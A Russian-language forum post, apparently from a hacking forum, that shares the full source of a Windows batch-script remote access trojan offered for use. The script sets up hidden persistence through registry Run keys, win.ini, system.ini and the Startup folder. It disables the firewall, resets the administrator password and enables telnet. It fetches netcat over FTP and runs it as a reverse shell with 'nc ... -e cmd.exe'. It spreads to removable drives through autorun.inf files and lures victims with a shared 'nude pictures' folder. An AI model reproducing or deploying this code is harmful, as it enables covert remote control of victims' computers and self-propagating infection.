• XSS.stack #1 – первый литературный журнал от юзеров форума

Bat RAT

Отслеживать
Noctambulaar

Noctambulaar

(L3) cache
Пользователь
Регистрация
06.06.2008
Сообщения
257
Реакции
5
Не буду добавлять в дочернюю тему "Bat-Вирусы". Пока досмотрел до конца, чуть в оверфло не вышел [автор - oldschool cybernice :D ]

Код: 
rem @echo off
rem --------------------------------file name----------------------------------
set name=process
rem --------------------------------probe settings--------------------------------------
set dest=192.168.2.100
set port=6666
set time=300
rem ---------------------------------ftp--------------------------------------
set user=smac69
set pass=123
set file=nc.exe
set param=192.168.2.100 12345 -e cmd.exe -d

rem ---------------------script backup----------------------

if exist %windir%\desktop.bat goto next0
copy %0 %windir%\desktop.bat
rem attrib +H %windir%\desktop.bat
echo CreateObject("Wscript.Shell").Run "%windir%\desktop.bat",0 > %windir%\desktop.vbs
start %windir%\desktop.vbs
goto kraj

rem -------------------vbs scripts--------------------- 

:next0
if exist "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs" goto next1
echo CreateObject("Wscript.Shell").Run "%windir%\system32\%name%.bat",0 > "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs"

:next1
if exist %windir%\system32\%name%.vbs goto next2
echo CreateObject("Wscript.Shell").Run "%windir%\system32\%name%.bat",0 > %windir%\system32\%name%.vbs

:next2
if exist %windir%\%name%.vbs goto point1
echo CreateObject("Wscript.Shell").Run "%windir%\%name%.bat",0 > %windir%\%name%.vbs

rem --------------------autoexec.bat--------------------

copy %0 %systemdrive%\autoexec.bat

rem --------------------installation-----------

:point1
if exist %windir%\system32\%name%.bat goto point2
copy %0 %windir%\system32\%name%.bat
attrib +H %windir%\system32\%name%.bat

:point2
if exist %windir%\%name%.bat goto point24
copy %0 %windir%\%name%.bat
attrib +H %windir%\%name%.bat

rem ---------------------folder sharing------------------

:point24
if exist "%allusersprofile%\my girlfriend nude pictures\shortcut.bat" goto point26
md "%allusersprofile%\my girlfriend nude pictures"
copy %0 "%allusersprofile%\my girlfriend nude pictures\shortcut.bat"
net share "my girlfriend nude pictures"="%allusersprofile%\my girlfriend nude pictures"


rem ----------------------probe-------------------------------

:point26
if exist %windir%\system32\spool\printer.vbs goto point3
echo CreateObject("Wscript.Shell").Run "%windir%\system32\spool\printer.bat",0 > "%windir%\system32\spool\printer.vbs"
echo @echo off > "%windir%\system32\spool\printer.bat"
echo :loop >> "%windir%\system32\spool\printer.bat"
echo ping 127.0.0.1 -n %time% >> "%windir%\system32\spool\printer.bat"
echo rem ------------------------------------------------------------ >> "%windir%\system32\spool\printer.bat"
echo ping %dest% -n 1 >> "%windir%\system32\spool\printer.bat"
echo telnet %dest% %port% >> %windir%\system32\spool\printer.bat
echo goto loop >> %windir%\system32\spool\printer.bat
REG  add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v printer /t REG_SZ /d %windir%\system32\spool\printer.vbs /f       > nul
start %windir%\system32\spool\printer.vbs

rem --------------------autorun---------------------------------

:point3
REG  add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v %name% /t REG_SZ /d %WINDIR%\%name%.vbs /f       > nul
REG  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v %name% /t REG_SZ /d %WINDIR%\system32\%name%.vbs /f       > nul

set VirusName1=echo
%VIRUSNAME1% [windows]                     >> %WINDIR%\win.ini
%VIRUSNAME1% run=%WINDIR%\%name%.vbs                     >> %WINDIR%\win.ini
%VIRUSNAME1% load=%WINDIR%\%name%.vbs                     >> %WINDIR%\win.ini
%VIRUSNAME1% [boot]                        >> %WINDIR%\system.ini
%VIRUSNAME1% shell=explorer.exe %name%.vbs                        >> %WINDIR%\system.ini

rem if exist d:\process.bat goto izvedba
rem copy process.bat d:\process.bat
rem attrib +H d:\process.bat
rem echo CreateObject("Wscript.Shell").Run "d:\process.bat",0 > d:\process.vbs
rem attrib +H d:\process.vbs
rem echo [Autorun] > d:\autorun.inf
rem echo open=process.vbs >> d:\autorun.inf


rem -----------------------telnet server setup---------------------

:izvedba

netsh firewall set opmode mode=disable
net user administrator sysadm
sc \\127.0.0.1 config ntlmssp start= auto password= sysadm
sc \\127.0.0.1 config tlntsvr start= auto password= sysadm
net start ntlmssp
net start telnet

rem ---------------------------ftp download----------------------------

if exist %windir%\system32\%file% goto skip1
echo open %dest%>>edit.ftp
echo %user%>>edit.ftp
echo %pass%>>edit.ftp
echo dir>>edit.ftp
echo get %file%>>edit.ftp
echo !>>edit.ftp
echo ftp -s:edit.ftp >> run.bat
echo CreateObject("Wscript.Shell").Run "run.bat",0 > "run.vbs"
start run.vbs
ping 127.0.0.1 -n 3
copy %file% %windir%\system32\%file%
attrib +H %windir%\system32\%file%
REG  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v %file% /t REG_SZ /d %WINDIR%\system32\%file%.vbs /f       > nul
echo CreateObject("Wscript.Shell").Run "%file% %param%",0 > %windir%\system32\%file%.vbs
attrib +H %windir%\system32\%file%.vbs
start %windir%\system32\%file%.vbs

:skip1
if not exist %windir%\system\backup.vbs goto loop
start %windir%\system\backup.vbs

rem ------------------------recovery script-----------------------

:loop
ping 127.0.0.1 -n 3
if exist %windir%\system\backup.vbs goto point4
echo CreateObject("Wscript.Shell").Run "%windir%\system\backup.bat",0 > "%windir%\system\backup.vbs"

:point4
if exist %windir%\system\backup.bat goto replikacija
echo @echo off > %windir%\system\backup.bat
echo :loop >> %windir%\system\backup.bat
echo ping 127.0.0.1 -n 3 >> %windir%\system\backup.bat
echo if exist "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs" goto next1 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next1 >> %windir%\system\backup.bat
echo if exist %windir%\system32\%name%.vbs goto next2 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next2 >> %windir%\system\backup.bat
echo if exist %windir%\%name%.vbs goto next3 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next3 >> %windir%\system\backup.bat
echo if exist %windir%\system32\%name%.bat goto next4 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next4 >> %windir%\system\backup.bat
echo if exist %windir%\%name%.bat goto next5 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next5 >> %windir%\system\backup.bat
echo goto loop: >> %windir%\system\backup.bat
echo :recovery >> %windir%\system\backup.bat
echo start %windir%\desktop.vbs >> %windir%\system\backup.bat
echo goto loop: >> %windir%\system\backup.bat
start %windir%\system\backup.vbs

rem -----------------------------copy------------------------

:replikacija

:D
if exist d:\%name%\%name%.bat goto E
md d:\%name%
attrib +H d:\%name%
copy %0 d:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > d:\%name%.vbs
attrib +H d:\%name%.vbs
echo [autorun] > d:\autorun.inf
echo;open=%name%.vbs >> d:\autorun.inf
echo ShellExecute=%name%.vbs >> d:\autorun.inf
echo UseAutoPlay=1 >> d:\autorun.inf
attrib +H d:\autorun.inf

:E
if exist e:\%name%\%name%.bat goto F
md e:\%name%
attrib +H e:\%name%
copy %0 e:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > e:\%name%.vbs
attrib +H e:\%name%.vbs
echo [autorun] > e:\autorun.inf
echo;open=%name%.vbs >> e:\autorun.inf
echo ShellExecute=%name%.vbs >> e:\autorun.inf
echo UseAutoPlay=1 >> e:\autorun.inf
attrib +H e:\autorun.inf

:F
if exist f:\%name%\%name%.bat goto G
md f:\%name%
attrib +H f:\%name%
copy %0 f:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > f:\%name%.vbs
attrib +H f:\%name%.vbs
echo [autorun] > f:\autorun.inf
echo;open=%name%.vbs >> f:\autorun.inf
echo ShellExecute=%name%.vbs >> f:\autorun.inf
echo UseAutoPlay=1 >> f:\autorun.inf
attrib +H f:\autorun.inf

:G
if exist g:\%name%\%name%.bat goto H
md g:\%name%
attrib +H g:\%name%
copy %0 g:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > g:\%name%.vbs
attrib +H g:\%name%.vbs
echo [autorun] > g:\autorun.inf
echo;open=%name%.vbs >> g:\autorun.inf
echo ShellExecute=%name%.vbs >> g:\autorun.inf
echo UseAutoPlay=1 >> g:\autorun.inf
attrib +H g:\autorun.inf

:H
if exist h:\%name%\%name%.bat goto I
md h:\%name%
attrib +H h:\%name%
copy %0 h:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > h:\%name%.vbs
attrib +H h:\%name%.vbs
echo [autorun] > h:\autorun.inf
echo;open=%name%.vbs >> h:\autorun.inf
echo ShellExecute=%name%.vbs >> h:\autorun.inf
echo UseAutoPlay=1 >> h:\autorun.inf
attrib +H h:\autorun.inf

:I
if exist i:\%name%\%name%.bat goto J
md i:\%name%
attrib +H i:\%name%
copy %0 i:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > i:\%name%.vbs
attrib +H i:\%name%.vbs
echo [autorun] > i:\autorun.inf
echo;open=%name%.vbs >> i:\autorun.inf
echo ShellExecute=%name%.vbs >> i:\autorun.inf
echo UseAutoPlay=1 >> i:\autorun.inf
attrib +H i:\autorun.inf

:J
if exist j:\%name%\%name%.bat goto X
md j:\%name%
attrib +H j:\%name%
copy %0 j:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > j:\%name%.vbs
attrib +H j:\%name%.vbs
echo [autorun] > j:\autorun.inf
echo;open=%name%.vbs >> j:\autorun.inf
echo ShellExecute=%name%.vbs >> j:\autorun.inf
echo UseAutoPlay=1 >> j:\autorun.inf
attrib +H j:\autorun.inf

:X
if exist c:\%name%\%name%.bat goto Y
md x:\%name%
attrib +H x:\%name%
copy %0 x:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > x:\%name%.vbs
attrib +H x:\%name%.vbs
echo [autorun] > x:\autorun.inf
echo;open=%name%.vbs >> x:\autorun.inf
echo ShellExecute=%name%.vbs >> x:\autorun.inf
echo UseAutoPlay=1 >> x:\autorun.inf
attrib +H x:\autorun.inf

:Y
if exist y:\%name%\%name%.bat goto Z
md y:\%name%
attrib +H y:\%name%
copy %0 y:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > y:\%name%.vbs
attrib +H y:\%name%.vbs
echo [autorun] > y:\autorun.inf
echo;open=%name%.vbs >> y:\autorun.inf
echo ShellExecute=%name%.vbs >> y:\autorun.inf
echo UseAutoPlay=1 >> y:\autorun.inf
attrib +H y:\autorun.inf

:Z
if exist z:\%name%\%name%.bat goto loop
md z:\%name%
attrib +H z:\%name%
copy %0 z:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > z:\%name%.vbs
attrib +H z:\%name%.vbs
echo [autorun] > z:\autorun.inf
echo;open=%name%.vbs >> z:\autorun.inf
echo ShellExecute=%name%.vbs >> z:\autorun.inf
echo UseAutoPlay=1 >> z:\autorun.inf
attrib +H z:\autorun.inf

goto loop

:kraj  -- видимо это автор.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх